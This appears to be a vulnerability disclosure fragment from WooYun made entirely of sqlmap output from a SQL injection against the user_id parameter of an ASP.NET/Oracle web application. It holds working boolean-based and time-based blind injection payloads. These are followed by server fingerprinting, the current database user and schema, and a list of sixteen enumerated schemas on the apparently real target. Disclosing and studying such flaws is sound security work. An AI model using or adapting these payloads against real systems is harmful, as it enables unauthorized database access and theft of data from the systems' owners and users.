WooYun.org

---
Place: GET
Parameter: user_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: user_id=34959270' AND 2767=2767 AND 'iHtc'='iHtc
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: user_id=34959270' AND 2656=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_U
SERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'ADwq'='ADwq
---

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 4.0.30128
back-end DBMS: Oracle

current user:    'SDM_SPM'

current schema (equivalent to database on Oracle):    'SDM_SPM'

available databases [16]:
[*] ADM
[*] ANALYSIS
[*] BAS
[*] CC
[*] CTXSYS
[*] EXFSYS
[*] LIDANE
[*] MDSYS
[*] OLAPSYS
[*] PART
[*] SDM_SPM
[*] SPM
[*] SYS
[*] SYSTEM
[*] WMSYS
[*] XIAOTG